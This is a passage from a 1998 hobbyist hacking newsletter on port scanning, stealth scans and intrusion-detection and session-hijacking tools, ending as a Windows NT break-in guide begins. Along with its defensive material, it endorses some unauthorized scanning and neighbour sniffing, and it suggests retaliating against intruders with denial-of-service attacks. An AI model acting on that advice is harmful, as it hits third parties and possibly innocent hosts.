of your ISP so they won’t kick you off for suspicion of computer crime. Also, it helps to get permission from the sysadmins of whatever network you are checking out. If you find a problem, you should notify the responsible sysadmin so he or she may fix the problem. It also helps to maintain a good reputation. If you are known as a troublemaker, you will get lots of grief for using the tools of this chapter. If you have a good reputation, people will believe it when you say you are exploring in order to learn network administration -- or simply for the pure joy of discovery. If your ISP is one of those big, anonymous places that would kick you off at the least sign of trouble, switch to a local ISP where you can drop in and offer to take the tech support staff out for pizza. Trust me on this, if you try out what this chapter teaches, almost any large ISP will soon give you the boot. ********************************* ********************************* You can go to jail warning: If you live outside the United States, be sure to check on what the local computer crime laws are. I can’t guarantee the tactics of this chapter will be legal everywhere. ********************************* IP Address and Port Scanning Every day someone emails me to complains that some host name in an ancient GTMHH won’t do cool stuff any more. Imagine that! When I wrote those first GTMHHs I was just sending them to a few friends. I assumed these Guides would soon fade out of existence in the vastness of the Internet. Little did I suspect that eventually tens of thousands of newbies would be fingering, telnetting, ftping, phfing and worse into those IP addresses. So of course their sysadmins have buttoned them down. Strangers can’t play with them any more. What really saddens me is how many people ask me for good host names they can use. It is so easy to find them yourself! If you want to be primitive about it, you can scan for IP addresses by hand. Find a tempting domain name while surfing the web, running traceroute or tracert, or in the headers of email. Then try the techniques of the “Port Surf’s Up!” chapter to see if there is anything interesting there. This is a good way to start, because you know exactly what you are doing and can get a gut feel for the process. Also, it’s quite a rush to discover something rare like the Internet backbone VAX/VMS in the port surfing chapter -- and discover that it is advertising the status of its huge network to you from port 15! There also are programs that will find live Internet host computers for you automatically. Many of these tools will also map which ports are open. They won’t always give you all the goodies you can get when you port surf by hand, but they find out the basics for you fast. ******************************** You can get punched in the nose warning: The downside of the IP scanner and port scanner tools of this chapter is that when you use them on other people’s computers without permission, this practically shouts “I am a criminal hacker.” Presumably this isn’t true, but way too many sysadmins have discovered that a port scan is soon followed by a break-in attempt. If you do insist on scanning without permission, it helps to scan Internet hosts owned by other hackers. If people who are obviously hackers complain, the sysadmins at your ISP or company LAN may not have much sympathy for them. Hey, they are hackers, they can take care of themselves. However, if you do this without the hackers’ permission, you just might incite a hacker war against you, which may nevertheless lead to losing your Internet access. ******************************** So we’re ready to scan for Internet hosts and their ports. Let’s start with how newbies can do it. You can get a Windows 95/98 program that scans IP addresses and ports, What’s Up Gold, from http://www.ipswitch.com. It’s free for a one month trial. It’s a simple point and click program that does an excellent job. Here’s what I get when I scan IP addresses from 198.987.999.1 through 198.987.999.254 looking for any open ports in the range of 1 through 600. This scan is set to check each port by waiting only 100 milliseconds for a response from each one: 198.987.999.033 198.987.999.036 80 198.987.999.044 198.987.999.048 198.987.999.049 198.987.999.066 198.987.999.067 198.987.999.074 198.987.999.080 198.987.999.113 198.987.999.115 198.987.999.118 198.987.999.167 I run the same scan again but with the time-out set to 1 second. This reveals many more live IP addresses and ports: 198.987.999.033 7 9 11 13 15 19 21 23 25 37 53 79 80 110 111 113 139 143 198.987.999.034 139 198.987.999.035 198.987.999.036 80 139 198.987.999.041 198.987.999.042 139 198.987.999.043 139 198.987.999.044 139 198.987.999.045 139 198.987.999.048 139 198.987.999.049 139 198.987.999.050 80 139 198.987.999.051 21 22 23 25 37 70 79 109 110 111 113 143 198.987.999.055 139 198.987.999.056 198.987.999.058 139 198.987.999.059 139 198.987.999.060 198.987.999.061 139 198.987.999.061 139 198.987.999.065 139 198.987.999.066 21 23 80 139 198.987.999.067 198.987.999.068 198.987.999.069 198.987.999.072 198.987.999.073 198.987.999.074 198.987.999.075 198.987.999.077 198.987.999.078 198.987.999.079 198.987.999.080 198.987.999.082 198.987.999.083 198.987.999.084 198.987.999.085 198.987.999.086 198.987.999.088 198.987.999.092 198.987.999.093 198.987.999.098 198.987.999.099 198.987.999.101 198.987.999.103 198.987.999.105 198.987.999.108 198.987.999.110 198.987.999.111 198.987.999.112 198.987.999.113 198.987.999.115 198.987.999.118 198.987.999.119 198.987.999.120 198.987.999.121 198.987.999.122 198.987.999.123 198.987.999.124 198.987.999.125 198.987.999.126 198.987.999.131 198.987.999.133 198.987.999.136 198.987.999.137 198.987.999.139 198.987.999.146 198.987.999.156 80 198.987.999.158 198.987.999.162 139 198.987.999.163 198.987.999.165 198.987.999.166 198.987.999.167 198.987.999.169 7 9 13 198.987.999.173 13 15 21 23 25 79 513 514 515 540 198.987.999.177 198.987.999.178 135 389 198.987.999.180 198.987.999.182 198.987.999.183 198.987.999.184 198.987.999.186 139 198.987.999.188 198.987.999.189 139 198.987.999.194 139 198.987.999.195 7 9 13 17 19 135 139 198.987.999.198 110 119 139 OK, I admit it, to save space I was trying to accomplish two slightly conflicting things with this particular set of IP addresses. These are (foobarred) dynamically assigned IP addresses of an ISP. These are assigned to dial-up customers. So some of these addresses will change or the users of the same address may change from one scan to the next. However, these two scans were done only a few minutes apart. So not many of the connections would have changed in this period. These scans show the importance of a long time-out setting in What’s Up. One second (1000 ms) has given me better results. Here, among these dynamically assigned IP addresses, is where I really get my kicks. Dynamically assigned IP addresses are the Rick’s Cafe -- no, the Star Wars Cantina -- of cyberspace. OK, most of these IP addresses reveal no open ports. They are probably mere dialups for downloading email or surfing the Web for people who wouldn’t know Unix from unicorns. However, since I chose the dynamic IP addresses of an ISP well-known for attracting hackers, this particular set of IP addresses is -- interesting. Check out “198.987.999.036 80 139”, “198.987.999.050 80 139”, and “198.987.999.156 80”. Those 80s represent ephemeral Web sites, in existence only so long as their dialups last. Wonder what they hold? The fact that almost all other services are turned off suggests sophisticated users. Maybe those Web sites will be passworded, or maybe I can get in... That “198.987.999.033 7 9 11 13 15 19 21 23 25 37 53 79 80 110 111 113 139 143” must be a Linux or other home Unix type box. It’s run by a real novice, I’d say, judging from all those open ports. Look at that port 21 open. Wonder if he or she has an anonymous ftp server? Better check it out before it winks out of existence. It also has a Web server... Take a look at “198.987.999.051 21 22 23 25 37 70 79 109 110 111 113 143”. That port 22 -- that means secure shell login. No webserver (80), no echo (7), discard (8), daytime (13), netstat (15) etc. Since these are ports that a cautious sysadmin would disable, these are signs this the box might be owned by a hacker. If this is a dynamically assigned IP address from an ISP on which you have a shell account, a quick look at netstat and/or the “last” command will probably reveal the user name of this hacker. Check out “198.987.999.198 110 119 139” and “198.987.999.178 135 389”. Weird selection of ports. Wonder if the owners of those boxes would tell me what they are up to? Hey, there’s a POP server (110). Maybe if I email “root@198.987.999.198” I will get a message through. Sheesh, I don’t know, I’m just playing around. Hacking. It’s OK to make mistakes and hit dead ends, because real hackers mess around, explore, and try out new things. If things don’t work, it’s no big deal. If they do work, however... If you have a Unix type computer, there are many other port scanners available. SATAN (Security Analysis Tool for Auditing Networks) is famous, free, and also will often identify ports that are vulnerable to attack. You can get it at ftp://ftp.cs.ruu.nl:/pub/SECURITY/. Possession of the code for SATAN is enough to get you kicked off some ISPs. Check out http://www.rootshell.com for other Unix port scanner programs that may not get people as suspicious at you. If you are willing to pay lots of money for a port scanner, several computer security companies sell them. Internet Security Systems (ISS) has an exceptionally good one, Internet Scanner (at http://www.iss.net). Like SATAN, Internet Scanner will identify security holes in the ports you scan. There are versions for both Unix and Windows NT systems. Because their software would be dangerous in the wrong hands, ISS will only sell you a version to scan the IP addresses you own or that the company you work for has given you permission to scan. Stealth Port Scanning You may have already heard that there are port scanners that are impossible to detect. If true, that would solve the problem of getting kicked off your ISP for running scans. One that I have tried out is Nmap, available for free from http://dhp.com. It runs on Unix type operating systems, and has options to do both normal port scanning and “stealth” port scanning. Warning -- like What’s Up, Nmap is not always accurate. While What’s Up misses open ports, Nmap often erroneously says closed ports are open. **************************** Wizard tip: Here’s why Nmap is inaccurate in fin scan (stealth or half-open) mode. It sends to each port on the victim computer a single packet with the fin flag (end of transmission) set. If it gets back a packet with the rst (reset) flag set, it reports the port as closed. If it doesn't get rst back, it reports it as open. Of course a dropped packet can also account for the missing rst. As a result, on a noisy connection Nmap shows many ports as open that aren't. Try fin scanning a nonexistent host with Nmap and you will see all ports reported open. On a theoretical basis, any scanner that sends only a single packet to probe each port is vulnerable to false results. *************************** There is another problem that afflicts all stealth scanners. They actually can be detected, and the sender identified, if the target network is running the right sniffer software. EtherPeek (discussed in detail below) is one we have tested against Nmap on the Happy Hacker Wargame (see http://www.happyhacker.org for details on how to play our Wargame). We discovered that EtherPeek definitely detects and identifies the user of stealth port scanners. How to Tell What Ports are Open on your own Computer It’s a good idea to regularly check what ports are open on your own computer. If you discover a new port -- time to investigate. For example, an open port 31337 is an almost sure sign that your computer has been taken over by the Windows Back Orifice Trojan. (See the “How to Break into Windows 95/98 Computers” chapter for removal instructions.) It is possible to check all your ports with just the tools that are already part of your Windows or Unix operating system. The “netstat -a” command will show all the ports open on your computer. Here’s what I get on a home Linux box: ~ > netstat -a Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 134 fu.ml.org:telnet pma03.foo66.com:1030 ESTABLISHED tcp 0 0 *:www *:* LISTEN tcp 0 0 fu.ml.org:22 *:* LISTEN tcp 0 0 *:smtp *:* LISTEN tcp 0 0 *:2049 *:* LISTEN tcp 0 0 *:660 *:* LISTEN tcp 0 0 *:printer *:* LISTEN tcp 0 0 *:auth *:* LISTEN tcp 0 0 *:finger *:* LISTEN tcp 0 0 *:imap2 *:* LISTEN tcp 0 0 *:pop3 *:* LISTEN tcp 0 0 *:login *:* LISTEN tcp 0 0 *:shell *:* LISTEN tcp 0 0 *:telnet *:* LISTEN tcp 0 0 *:ftp *:* LISTEN tcp 0 0 *:time *:* LISTEN tcp 0 0 *:sunrpc *:* LISTEN udp 0 0 *:2049 *:* udp 0 0 *:657 *:* udp 0 0 *:ntalk *:* udp 0 0 *:biff *:* udp 0 0 *:time *:* udp 0 0 *:syslog *:* udp 0 0 *:sunrpc *:* raw 0 0 *:1 *:* Active UNIX domain sockets (including servers) Proto RefCnt Flags Type State I-Node Path unix 2 [ ] STREAM 3870 /dev/log unix 2 [ ] STREAM CONNECTED 3869 unix 2 [ ] STREAM 475 /dev/log unix 2 [ ] STREAM CONNECTED 474 unix 2 [ ] STREAM 434 /dev/log unix 2 [ ] STREAM CONNECTED 433 unix 2 [ ] STREAM 281 /dev/log unix 2 [ ] STREAM CONNECTED 280 unix 2 [ ] STREAM 257 /dev/log unix 2 [ ] STREAM CONNECTED 252 unix 1 [ ACC ] STREAM LISTENING 247 /dev/printer unix 2 [ ] STREAM 246 /dev/log unix 1 [ ACC ] STREAM LISTENING 207 /dev/log unix 2 [ ] STREAM CONNECTED 198 How about seeing what ports are open on your Windows computer? If you are not on a LAN, chances are there won’t be much to see. Here’s what my stand alone Win98 computer (her name is Lovely_Lady) says when I am on America Online: C:\WINDOWS>netstat -a Active Connections Proto Local Address Foreign Address State TCP lovely-lady:137 LOVELY_LADY:0 LISTENING TCP lovely-lady:138 LOVELY_LADY:0 LISTENING TCP lovely-lady:nbsession LOVELY_LADY:0 LISTENING UDP lovely-lady:nbname *:* UDP lovely-lady:nbdatagram *:* How to Give Computer Criminals a Hard Time Now -- are you ready for war? First, you need to know whether an intruder is on your system. How to do that is worth at least another entire chapter that I haven’t written yet. However, there are some hints for sysadmins I can give you on the basis of first hand experience from our Happy Hacker Wargame. Don’t expect this to be more than a tiny bit of all you should be doing to detect intruders, however. · Look for unusual traffic patterns -- for example, many ftp sessions, or a user who hasn’t logged into a shell account for months suddenly spending hours at a time logged in. · A new user name and account that no one remembers creating · Watch the processes. A skilled hacker may replace the “ps” command with a Trojan that hides his or her activities. However, you might see a high CPU utilization when the processes running couldn’t account for it. Time to go red alert! · Check whether system configurations have changed, for example new ports open. Or if your policy is to automatically kill all processes when a user logs off (most ISPs do this), perhaps you will discover processes left running after logoff. · Look for an Ethernet card on your local area network that is in promiscuous mode (meaning it is accepting all packets broadcast on the network). That probably means an intruder is sniffing your network with a program hidden on the computer with the promiscuous mode card. · Look for suspiciously large files turning up. They may be secret sniffer logs. · Do you notice a hacked Web page or obscene Message of the Day -- OK, this suggestion is lame, you knew those signs of hacker attack already! Of course it’s far better to detect your attacker before he gets inside. Signs that someone is trying to break in are basically activities that we all like to do such as port scans and telnet connections to unusual ports. Coming up in Part II: both free and commercial programs that help you fight intruders! # # # Guess what? “The Happy Hacker Book” has almost sold out its First Edition, published March 31, 1998. So American Eagle Publications is putting out a Second Edition, due to come off the presses Sept. 31, 1998. It has several all-new chapters as well as updates to cover Windows 98 and the major changes that are happening in email forging and spam fighting. How’s that -- only six months between editions? This is partly because people were so quick to buy out the First Edition -- and partly because the hacking scene is changing so fast. So instead of going to a second printing, the publisher agreed to spend the extra money to create a Second Edition so we could keep you as up to date as possible. If you want to buy one of the few remaining copies of the First Edition of “The Happy Hacker” (soon to be a collector’s item), you can order it from me ($34.95 for Priority mail shipping in the US; $35.95 airmail in Canada and Mexico; email me for quotes outside the US) by sending a check or money order to PO Box 1520, Cedar Crest NM 87008. Since I only have 18 copies left today, if your order comes in too late, be sure to tell me whether I should just return your money or if you want me to hold on to it and be among the first to get a Second Edition. Oh, yes, I autograph all books bought directly from me. _______________________________________________________________________ Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don’t email us about any crimes you have committed! And don’t expect us to come to your rescue if you crash 100 million computers with some new Java virus you just unleashed. To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1998 Carolyn Meinel. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. _______________________________________________________________________ ____________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 9, Part 2 War Tools! Scan, Sniff, Spoof and Hijack ____________________________________________________________ Note: This Guide is excerpted from the upcoming Second Edition of “The Happy Hacker” book, available Sept. 31, 1998. So now that we know it’s time to fight intruders, let’s start with free anti-crime tools that are great not only for sysadmins, but also for casual users who just want to have fun. Twinsen (hacker handle) has written Port Dumper, which is a good program for Unix type computers which will deal with snoopers like me. He says “I use this to play with my friends. This program is used to listen to a port (any port), after it is connected with others, you can type something and Port Dumper will send it. It is quite useful when you want to fake a service, such http, smtp, etc... or even telnet (Evil Genius Tips: You know it!) It is in my homepage, Channel X Security Information (http://home.netvigator.com/~jcatchan/). I may write a guide on using it to do a specified mission (such as faking as an http server...) later. Hope you'll enjoy using it! Use at your own risk.. I’m not responsible for the use of this stupid shell script.... Richard Thomas (Humble) has written RotoRouter., “a program for logging and faking the standard Unix udp-based traceroute... . When someone is about to do a DOS (denial of service attack), it is commonplace for them to traceroute to the target, launch the attack, and traceroute again to see the effect..., secure in the belief that their traceroute will never be noticed. They commonly trace from their home machines (99% of packet warriors have 28.8k modems and bandwidth envy, right :P), or ... from the hacked machine they are attacking with.” RotoRouter is a great way to fake out those losers who think attacking other people’s networks is fun. It sends fake Time Exceeded and Destination Unreachable messages. In Humble’s words, other ways his program can fake out people include: · Lead those stupid smurf kiddies away from your vulnerable routers · Lie to customers about your bandwidth... · Scare your ... friends with odd routes, watch their heads explode · Make the final hop reverse to "this.traceroute.has.been.logged.com" However, to run RotoRouter, you must install it on a Unix type computer -- as root. This is another reason to run Linux on your home computer. If you have what it takes to run RotoRouter and want to fake out people and fool attackers, you can get it at http://www.bitchx.com/~humble/. If you really want to have fun, and if you suspect someone has broken into your system, there is a free program for Unix computers called TTY-Watcher It is available from http://www.engarde.com. TTY-Watcher lets you see exactly what anyone is typing on their keyboard while they are logged on to your computer. You can even record their keystrokes and play them back at the same speed the intruder typed them -- or play them back faster, if that d00d is a slow typist. You can also download a free trial of the more advanced Windows version of this program, T-sight, from the En Garde Systems web site. I’ve seen some playbacks. They make fabulous party entertainment. On one, someone had broken into a computer at Los Alamos Laboratories that actually was a “bait” computer used to practice fighting computer criminals -- using real unsuspecting computer criminals. This particular criminal was trying to send email from this computer bragging of his (hah, hah) feat and demanding that Kevin Mitnick be released from prison. What was fascinating was that Mr. Computer Criminal kept on entering MS-DOS commands on the hacked computer, which didn’t work because it was running Unix. After about 20 tries he finally managed to send out his email boast. Then he tried to destroy the evidence of his crime by erasing the entire hard disk. However, he found this hard to do. He kept on giving various erase commands, then listing the directories, and the stuff didn’t seem to be disappearing. You could almost feel his rising panic. TTY-Watcher is ideal for when you and your friends are playing hacker wargames where the attacker starts from a shell account on the victim computer. By seeing exactly what other people are doing to leverage unprivileged shell access into root access, you can learn a lot about how to detect and fight attacks. You also can also better understand why it is so hard nowadays to get a shell account on an ISP. TTY-Watcher is outstandingly good at one thing: it allows you to control your victim intruder. I watched this happen once on a friendly hacker wargame. The guy running TTY-Watcher felt sorry for the other player, took over the poor guy’s session and fixed his commands. If your intruder is hostile, and you wanted to mess up his commands instead, you could make his day profoundly bad. The only weakness of TTY-Watcher is that it only runs on one machine. It isn’t set up to defend an entire network. If you just need a free program to watch what is flowing on your local Ethernet, try Sniffit, available for free from http://www.rootshell.com. It’s boring compared to some of the above programs, but valuable for more sophisticated users who need to understand the technical details of how an intruder got in. Its description, “A very flexible network sniffer that has many interesting features (like curses)” suggests that it may be used by your intruders to sniff your network. Computer criminals love Sniffit. If you can become intimately familiar with its features, it will be easier for you to find a hidden Sniffit in operation. Another program for watching criminals at work on Windows computers is TCPview. It is available for free from http://www.sysinternals.com/. It is a GUI (graphical user interface) utility that tells you at any time what connections are open to your box, and what is going on with each connection. If you are brave, or perhaps foolhardy, you could always try running Back Orifice on your Windows computer. The promotional material for this free program make it sound useful for being able to keep your computer out of trouble when you are away from it by logging into it from the Internet. However, it is quite difficult to uninstall Back Orifice. Also, it was written by a member of the Cult of the Dead Cow, a gang notorious for an excessive sense of humor. Many computer security experts warn that Back Orifice is a Trojan that will make it easy for strangers to get into your computer. I don’t recommend ever installing Back Orifice. If you have installed it and want to get rid of it, removal instructions are in the chapter “How to Break into Windows 95/98 Computers.” Suppose you want to see whether someone is port scanning you or trying to break into a port. One useful utility is Nukenabber, available from http://www.winfiles.com, in the Winsock area. It watches up to 50 ports simultaneously. Yes, it is a Windows program, and it’s free. Industrial Strength War Programs Now -- let’s say you are responsible for a large LAN or an entire ISP. Especially if you are responsible for a commercial Web site, this is a job that calls for much more than the programs above can do. According to an International Computer Security Association report of April, 1997, about a half of US Web sites are attacked or probed each month. True, most of these are probes from the clueless, but even the clueless get lucky sometimes. You may well need security products that can handle a broad spectrum of computer crime problems, that work across a network, and that can spot the most sophisticated attacks. Most important, you need the power to fight back. Since I don’t like to take a company’s word for the quality of their security products, I will only discuss the two that I have tested: EtherPeek 3.5 for MacOS, from AG Group at http://www.aggroup.com; and IP-Watcher for Unix from En Garde Systems, http://www.engarde.com. I picked those two because they promised exceptional powers to detect attack, and in the case of IP-Watcher, to fight back when under attack. EtherPeek in particular also gets high recommendations from sysadmins I know at the AGIS Internet backbone, and Rt66 Internet, the largest ISP in New Mexico. Both AGIS and Rt66 have had more than their share of attacks by computer criminals, so they have had real life experience with EtherPeek. Another plus for EtherPeek and IP-Watcher is that they are both ideal for testing other security products such as firewalls, router packet filters, and wrappers, and to track down and gather the evidence needed to put computer criminals behind bars. Let’s begin with EtherPeek. Besides the Mac version, there is a version that runs on Windows NT, and even Windows 95/98. However, I recommend the Mac version because not many hackers know how to compromise, disable or crash Macs. Windows, by contrast, is vulnerable to the many denial of service attacks that kode kiddies think are 31337 (elite). While you can protect your Windows boxes from attacks from the Internet with a well-configured router and firewall, what if the intruder is inside your LAN? ********************************************** Wizard tip: If you have a cable modem, try EtherPeek on it. You will probably discover your cable modem is a node on an Ethernet -- and you can see what everyone else on your cable system is doing! That means, of course, that the other guys can see you. Even without EtherPeek, it could be a great playground to test your ability to figure out the details of all the hardware on your cable modem network. ********************************************** ********************************************** You can get punched in the nose warning: It probably won’t be a good idea to exploit what EtherPeek tells you to tease your next door neighbor about his visit last night to bianca’s Smut Shack. ********************************************** EtherPeek is good for evaluating your security setup. For example, EtherPeek can be used to check the way people login to computers on your network to find out whether these boxes are correctly configured to only send encrypted passwords over your Ethernet. This is necessary because, amazingly enough, many network file servers, mail systems, and databases automatically install in such a way that they send clear text passwords over the network. Once an attacker breaks into one box on a network like that, he or she can install a program such as Sniffit and soon capture every password. Here’s an important note. If your network uses Microsoft Point-to-Point Tunneling Protocol (PPTP) to encrypt passwords, and if you have a Solaris box on your LAN, you are nevertheless heading for trouble. There is a free sniffer at http://www.l0pht.com/l0phtcrack which that runs on Solaris and captures encrypted PPTP passwords. Another free program at this site cracks them. By the time you read this, there may be versions of this sniffer that run on other operating systems, too. For a cryptographic analysis of why it is easy to crack PPTP, see http://www.counterpane.com/pptp.html However, back to EtherPeek. It has a “Tools” menu that allows you to test firewalls and routers. For example, you can check to make sure the firewall is blocking the computers on your LAN from replying with valuable information to a port scan from someone on the outside. The creator of EtherPeek and president of AG Group, Mahboud Zabetian, also explains that his software can collect “messages looking for passwords.” EtherPeek has a “File Transfer Protocol (ftp) application in the TCP/IP suite has a PASSWORD embedded command in the command stream channel that is ideal for filter writing. By setting up EtherPeek with a filter for PASSWORD commands embedded in FTP, the security person can quickly examine why systems are failing password connections or where high connection count password attempts are coming from when trying to find the source of random login hacking.” OK, I agree with you, the kind of cracker who repeatedly attempts to get into an ftp server by guessing at passwords is seriously lame. However, even lame hackers sometimes get lucky. You would be surprised at how many users choose a password that is the same as their user name, or even choose to have no password at all (just hit “enter”). The best way to deal with this problem is to run a program that forces users to choose secure passwords. Alec Muffet’s cracklib will do this. It’s available for free at http://www.nmrc.org/files/sunix/index.html. Zabetian also has advice for how to spot the sophisticated break-in artist at work. “By looking for what ‘does not belong’ on the network connections as well as what does...” one may spot “potential security issues before they become problems. For instance, if there are a lot of connection attempts from a specific address external to the authorized group, it’s time to pay a visit to the offender and find out what’s going on before it gets serious.” Yes, that’s right, a hacker really can get punched in the nose, er, paid a “visit,” if he or she does too much port scanning and poking around someone’s network. For best results, EtherPeek (or any good computer crime fighting software) should be set up on one computer outside the firewall (you do have a firewall, right?) and another inside to deal with the intruders who manage to get inside anyhow. Besides, almost half of all computer crime is committed by people who are already users on the local area networks they attack. EtherPeek is shipped with a companion program, AGNetTools, which can port scan your network while EtherPeek records its results. As mentioned above, one of the warning signs that you have an unexpected visitor is unauthorized ports showing up. Also, sometimes someone gets careless and accidentally opens a Web or ftp port that has little or no security -- and opens the door to invaders. EtherPeek is a great hacker research tool, too. It can detect the corrupted packets of exploits such as Land and Teardrop that disable vulnerable computers. It can save these packets for you to resend against a test computer so you can learn how they do their dirty work. Besides, sometimes there is a hardware glitch that accidentally manufactures destructively corrupt packets. One time when Rt66 Internet was suffering from corrupt packets, EtherPeek helped a sysadmin find the offending hardware within minutes. Occasionally you may be attacked by a truly sophisticated opponent. For example, one trick is to run a denial of service attack such as syn flood in which each packet has a different origination IP address. This will trick many router and firewall defenses into not realizing they are under an attack which will soon shut them down. EtherPeek, however, can analyze (but not deflect) this attack. As mentioned above, EtherPeek easily identifies the sender of so-called stealth port scans. It also detects the true IP address of someone setting up a spoofed IP connection. The attacker is sitting there sending messages to the victim computer thinking that the identity of his computer is hidden. Yet on the other end a sysadmin is looking on the screen of his Mac G3 at the IP address, laughing as he unleashes a Teardrop attack to crash the attacker’s computer. Sorry, EtherPeek doesn’t strike back. You have to go to a site such as http://www.rootshell.com to get denial of service software such as Teardrop to strike back at the bad guys. ******************************* You can go to jail warning: What if the attacker is on a hacked account of an innocent victim? You might get into trouble if you retaliate with a denial of service attack. ******************************* ******************************* Wizard tip: If you can determine that your attacker is on a dynamically assigned IP address, you might be able to fight back with impunity. A good way to see whether an IP address is dynamically assigned is the command “nslookup hostname” where you substitute the attacking IP address for “hostname”. If you get back an answer “Non-existent host/domain,” it may be time to fight back! However, if this gets you in trouble anyhow -- remember I warned you. ******************************* So what do you do when the bad guys attack? EtherPeek can set off a pager when it detects suspicious activity. When the day comes that you are under serious attack, you need to be physically at the network, even if it means being rousted out of bed. Sometimes the only thing you can do to halt your attacker is to physically disconnect your network from the Internet. If you have modem access to your network, you also have to make certain you know where all the modems are, and disable dial-ins. (Use a wardialer to check for secret modem connections to your LAN.) EtherPeek is also useful for logging the evidence you need to put your attackers behind bars. IP-Watcher, written by Mike Neuman, president of En Garde Systems (http://www.engarde.com) is in some ways an even more powerful tool for putting computer criminals behind bars. Neuman has worked closely with several customers to get arrests and convictions of these destructive intruders. This gives him the real-world experience needed to design a tool that will gather evidence that will stand up in court. While gathering evidence, IP-Watcher has the power to protect your network by letting you hijack the attacker’s IP session. You can secretly divert the attacker into a “jail” computer where he or she will think they are still at the IP address of the computer they originally broke into. If it turns out this is a malicious intruder, you can record his or her activities in order to prove criminal intent, while not risking anything outside the jail computer. This software was written, according to Neuman, with “our philosophy of manual intrusion detection ... based on the fact that an intruder must establish connections with other computers to accomplish his or her goal. These connections are an intruder's footprints, and the best way to catch the intruder is to have an advanced visualization of those footprints.” The Windows version of IP-Watcher, T-sight, is, according to Neuman, even more advanced than IP-Watcher. Like EtherPeek, Neuman’s products have an option to page you when they detect that someone has broken in. IP-Watcher would be a deadly tool in the hands of criminals. In order to prevent its abuse, En Garde Systems will only sell your copy of the software pre-compiled for your particular network on which you plan to run it, and enabled to only sniff and control IP sessions on your LAN. Neuman points out a number of ways IP-Watcher can be abused: · IP-Watcher can create network traffic with spoofed source and destination addresses. This makes it possible to kill any user’s connection. While this is essential for stopping attackers, it also could be used to deny access to a legitimate user. · When IP-Watcher terminates a user’s connection while trying to log in, it looks to the user like the network merely had a fault. Normally the user will try to log in again, at which point IP-Watcher can divert his connection so that it steals the user’s password. · If a sysadmin uses the “su” command to enter a root account, IP-Watcher will sniff the cleartext password through its ability to log keystrokes. · This software also can be set to log what it sniffs in many small files. This is useful because it makes it hard for an intruder to edit log files. However, if IP-Watcher is in the hands of an attacker, this feature prevents the sysadmin from discovering a hidden sniffer by the technique of looking for unexplained large files. · Even one-time password systems are vulnerable to IP-Watcher. It can be used to hijack a connection by a trusted user. While the user is going about his or her business, the intruder can be secretly using the same connection to install back doors. ********************************** You can go to jail warning: Computer criminals may be tempted to attempt to break into the En Garde Systems’ LAN in hopes of stealing the source code for T-sight and IP-Watcher. This is probably the best place to go if one sincerely wants to get convicted of a computer crime. ********************************** Conclusion Self defense against computer criminals is a topic hat has long been neglected. This is because you have to think like an attacker and be intimately familiar with his or her tools and tactics. However, many systems administrators rely solely on commercial computer security products to keep the bad guys out. The problem is: no firewall is perfect! By contrast, if you use some of the software and techniques of this chapter to watch for and battle intruders, you have a fighting chance even if your firewall fails to stop the bad guys. Also, it can be fun to detect and fight your attackers. Be sure to save those TTY-Watcher logs so you can play back your latest hacker battle at parties! _______________________________________________________________________ Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don’t email us about any crimes you have committed! And don’t expect us to come to your rescue if you crash 100 million computers with some new Java virus you just unleashed. To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1998 Carolyn Meinel. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. _________________________________________________________ __________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 10 Part 1 How to Break into Windows NT ____________________________________________________________ by keydet89@yahoo.com "Improving the security of your site by breaking into it, the NT version" The purpose of this article is to illustrate to NT users (and sysadmins) how to test and verify the security of their own system or site by breaking into it, using the techniques that an attacker would use. Further, this guide assumes that you are using NT to test an NT system...the Win95 versions of the commands used in this guide aren't as powerful as the NT versions. *********************************************************** YOU COULD GO TO JAIL WARNING: Gaining unauthorized access to computers is against the law...read the GTMHH files on computer crime and the law. If you want to try out some or all of the techniques presented here, make sure that you get permission. *********************************************************** In 1993, Dan Farmer and Wietse Venema wrote a paper called "Improving the security of your site by breaking into it." This paper took the view of "what better way to test your computer and network security of your site than by breaking into it." This is a good view to take...try using "hacker" techniques to break into your site to see how vulnerable you are. The paper in question can be found at: http://www.trouble.org/security. A good place to start for reference is a previous GTMHH entitled "NT Security - Locking down the system". This guide discusses some of the steps that need to be taken to secure an NT workstation or standalone server. The guide also contains links to files that contain more in-depth information and explanations, as well as information particular to sysadmins. In review of the previous guide, some "light" reading: Hobbitt's CIFS file at http://207.98.195.250/texts/cifs.txt Vacuum's NT Exploits document at http://207.89.195.250/texts/ NeonSurge's documents at http://207.89.195.250/texts/ Santeria Systems' "Hardening NT" document at http://pw2.netcom.com/~honeyluv/index.html Most of the techniques outlined in this guide are meant to be run against the local system, by using the IP address assigned by your ISP. However, it's more fun to get with your friends, and connect your systems to the Internet. Then meet at one location, and try these techniques against your own systems. The methods described in this guide are intended to be exercises for the reader. [The Remote Attack] In order to protect your system from outside attack, you need to think like an attacker. What does an attacker want with your system? Access...it's all about access. Regardless of the motives or ultimate goals, an attacker wants access. Preferably, root/admin access...the attacker wants to gain administrator access to your system, or "own" your system. So to ensure that your system is secure, you need to "attack" it the way the attacker would. To begin with, you need to see what the attacker sees. In order to find potentially vulnerable NT (or 95) systems, all you need to do is scan a range of IP addresses to see if port 139 is open. Port 139 is the "NetBIOS session" port, that is used in file and print sharing...which is potentially the most dangerous aspect of NT! To locate systems with port 139 active, get a port scanner like Sam Spade (http://www.blighty.com). Sam Spade lets you scan a range of IP addresses for a single port. Try running whichever port scanner you use against your own system. ******************************************************************** NEWBIE NOTE: Finding a system with port 139 open does not auto- matically mean that the target system is 95 or NT. Un*x and Linux systems run SAMBA, which allows them to share file "the Microsoft way". However, the focus of this guide is NT, so we'll leave SAMBA for another day. ******************************************************************** Okay, so you've run a port 